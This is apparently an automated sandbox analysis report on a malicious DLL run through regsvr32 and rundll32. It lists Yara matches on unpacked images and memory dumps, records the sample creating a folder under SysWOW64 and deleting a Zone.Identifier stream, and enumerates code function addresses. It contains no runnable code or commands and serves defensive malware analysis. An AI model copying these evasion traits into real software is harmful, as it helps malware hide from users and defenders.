Source: Yara match	File source: 5.2.rundll32.exe.4820000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4060000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.52b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.47f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4690000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5410000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4c00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.2a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.47c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5220000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4850000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5250000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5280000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.53e0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.46c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4c70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.51f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.51c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.2a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5110000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.2ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5140000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.51c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.53e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5220000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.353899484.00000000047F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354941726.0000000005411000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.354039628.0000000004851000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353678279.00000000046C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354572676.0000000005220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.397064444.0000000002A80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354868089.00000000053E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354398198.00000000051C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354782751.00000000052B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353971003.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354142339.0000000005110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353601392.0000000004690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.397100803.0000000002AD1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.351221459.0000000004C01000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.350955081.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353804496.00000000047C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354700642.0000000005280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354625308.0000000005251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354494384.00000000051F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.352946917.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354257894.0000000005141000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353590253.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.396217963.0000000003230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, type: MEMORY

System Summary:

Source: CSxylfUJcL.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Ovttmq\chwg.qvw:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Ovttmq\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10020011	2_2_10020011
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100181CA	2_2_100181CA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001929D	2_2_1001929D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002542D	2_2_1002542D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100274AE	2_2_100274AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10026575	2_2_10026575
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001869D	2_2_1001869D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001178A	2_2_1001178A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10016860	2_2_10016860
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002596F	2_2_1002596F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10022A5C	2_2_10022A5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10018A71	2_2_10018A71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001AAB7	2_2_1001AAB7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001CB16	2_2_1001CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10018E7D	2_2_10018E7D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10025EB1	2_2_10025EB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B985FF	2_2_04B985FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9EFDD	2_2_04B9EFDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B81CA1	2_2_04B81CA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9E4E5	2_2_04B9E4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9CCD9	2_2_04B9CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B83431	2_2_04B83431
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9DC71	2_2_04B9DC71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9A474	2_2_04B9A474
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B87442	2_2_04B87442
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8A445	2_2_04B8A445
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B93D85	2_2_04B93D85
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B855FF	2_2_04B855FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B99DF5	2_2_04B99DF5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8C5D8	2_2_04B8C5D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9C5D5	2_2_04B9C5D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B98D3D	2_2_04B98D3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B95515	2_2_04B95515
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9AD08	2_2_04B9AD08
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B97D5B	2_2_04B97D5B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA2D53	2_2_04BA2D53
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9654A	2_2_04B9654A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8C6B8	2_2_04B8C6B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B90EBC	2_2_04B90EBC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA46BD	2_2_04BA46BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA36AA	2_2_04BA36AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B93EAA	2_2_04B93EAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9BEFD	2_2_04B9BEFD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA3EE9	2_2_04BA3EE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B88636	2_2_04B88636
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B87E79	2_2_04B87E79
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9567B	2_2_04B9567B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8DE74	2_2_04B8DE74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B92E5D	2_2_04B92E5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8E640	2_2_04B8E640
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B857B8	2_2_04B857B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8BFBE	2_2_04B8BFBE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA17BD	2_2_04BA17BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA07AA	2_2_04BA07AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B98FAE	2_2_04B98FAE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B877A3	2_2_04B877A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B90F86	2_2_04B90F86
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B927F9	2_2_04B927F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B907F4	2_2_04B907F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B967E6	2_2_04B967E6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8E7DE	2_2_04B8E7DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B81F38	2_2_04B81F38
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8670B	2_2_04B8670B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8EF0C	2_2_04B8EF0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B95779	2_2_04B95779
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B94F74	2_2_04B94F74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B99774	2_2_04B99774
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9FF58	2_2_04B9FF58
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8F0E9	2_2_04B8F0E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA00EF	2_2_04BA00EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9D8DB	2_2_04B9D8DB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B880C0	2_2_04B880C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8B820	2_2_04B8B820
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA2009	2_2_04BA2009
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B98806	2_2_04B98806
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B87078	2_2_04B87078
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8A871	2_2_04B8A871
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9F840	2_2_04B9F840
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9D1BC	2_2_04B9D1BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B82194	2_2_04B82194
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B96187	2_2_04B96187
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9E1F8	2_2_04B9E1F8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9017B	2_2_04B9017B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9E955	2_2_04B9E955
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8D14C	2_2_04B8D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B92142	2_2_04B92142
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B90ABA	2_2_04B90ABA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8BAA9	2_2_04B8BAA9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9A2A5	2_2_04B9A2A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9CAD5	2_2_04B9CAD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B97A0F	2_2_04B97A0F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B99A01	2_2_04B99A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA3263	2_2_04BA3263
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA0A64	2_2_04BA0A64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B94A66	2_2_04B94A66
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9B257	2_2_04B9B257
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B94244	2_2_04B94244
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8238C	2_2_04B8238C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8FB8E	2_2_04B8FB8E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B84BFC	2_2_04B84BFC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9FBDE	2_2_04B9FBDE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B95333	2_2_04B95333
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04BA2B09	2_2_04BA2B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B86B7A	2_2_04B86B7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B9437A	2_2_04B9437A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8F369	2_2_04B8F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10020011	3_2_10020011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100181CA	3_2_100181CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001929D	3_2_1001929D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002542D	3_2_1002542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100274AE	3_2_100274AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10026575	3_2_10026575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001869D	3_2_1001869D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001178A	3_2_1001178A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10016860	3_2_10016860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002596F	3_2_1002596F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10022A5C	3_2_10022A5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10018A71	3_2_10018A71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001AAB7	3_2_1001AAB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001CB16	3_2_1001CB16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10018E7D	3_2_10018E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10025EB1	3_2_10025EB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C185FF	3_2_04C185FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1EFDD	3_2_04C1EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1CCD9	3_2_04C1CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1E4E5	3_2_04C1E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C01CA1	3_2_04C01CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C07442	3_2_04C07442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0A445	3_2_04C0A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1DC71	3_2_04C1DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1A474	3_2_04C1A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C03431	3_2_04C03431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1C5D5	3_2_04C1C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0C5D8	3_2_04C0C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C19DF5	3_2_04C19DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C055FF	3_2_04C055FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C13D85	3_2_04C13D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1654A	3_2_04C1654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C22D53	3_2_04C22D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C17D5B	3_2_04C17D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1AD08	3_2_04C1AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C15515	3_2_04C15515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C18D3D	3_2_04C18D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C23EE9	3_2_04C23EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1BEFD	3_2_04C1BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C236AA	3_2_04C236AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C13EAA	3_2_04C13EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0C6B8	3_2_04C0C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C10EBC	3_2_04C10EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C246BD	3_2_04C246BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0E640	3_2_04C0E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C12E5D	3_2_04C12E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0DE74	3_2_04C0DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C07E79	3_2_04C07E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1567B	3_2_04C1567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C08636	3_2_04C08636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0E7DE	3_2_04C0E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C167E6	3_2_04C167E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C107F4	3_2_04C107F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C127F9	3_2_04C127F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C10F86	3_2_04C10F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C077A3	3_2_04C077A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C207AA	3_2_04C207AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C18FAE	3_2_04C18FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C057B8	3_2_04C057B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0BFBE	3_2_04C0BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C217BD	3_2_04C217BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1FF58	3_2_04C1FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C14F74	3_2_04C14F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C19774	3_2_04C19774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C15779	3_2_04C15779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0670B	3_2_04C0670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0EF0C	3_2_04C0EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C01F38	3_2_04C01F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C080C0	3_2_04C080C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1D8DB	3_2_04C1D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0F0E9	3_2_04C0F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C200EF	3_2_04C200EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1F840	3_2_04C1F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0A871	3_2_04C0A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C07078	3_2_04C07078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C18806	3_2_04C18806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C22009	3_2_04C22009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0B820	3_2_04C0B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1E1F8	3_2_04C1E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C16187	3_2_04C16187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C02194	3_2_04C02194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1D1BC	3_2_04C1D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C12142	3_2_04C12142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0D14C	3_2_04C0D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1E955	3_2_04C1E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1017B	3_2_04C1017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1CAD5	3_2_04C1CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1A2A5	3_2_04C1A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0BAA9	3_2_04C0BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C10ABA	3_2_04C10ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C14244	3_2_04C14244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1B257	3_2_04C1B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C23263	3_2_04C23263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C20A64	3_2_04C20A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C14A66	3_2_04C14A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C19A01	3_2_04C19A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C17A0F	3_2_04C17A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1FBDE	3_2_04C1FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C04BFC	3_2_04C04BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0238C	3_2_04C0238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0FB8E	3_2_04C0FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0F369	3_2_04C0F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C06B7A	3_2_04C06B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C1437A	3_2_04C1437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C22B09	3_2_04C22B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C15333	3_2_04C15333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8B257	4_2_04C8B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C84A66	4_2_04C84A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7DE74	4_2_04C7DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C92009	4_2_04C92009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C87A0F	4_2_04C87A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C78636	4_2_04C78636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8EFDD	4_2_04C8EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7C5D8	4_2_04C7C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C885FF	4_2_04C885FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C917BD	4_2_04C917BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8654A	4_2_04C8654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C82142	4_2_04C82142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8FF58	4_2_04C8FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8E955	4_2_04C8E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8AD08	4_2_04C8AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7670B	4_2_04C7670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C780C0	4_2_04C780C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8CCD9	4_2_04C8CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8D8DB	4_2_04C8D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8CAD5	4_2_04C8CAD5
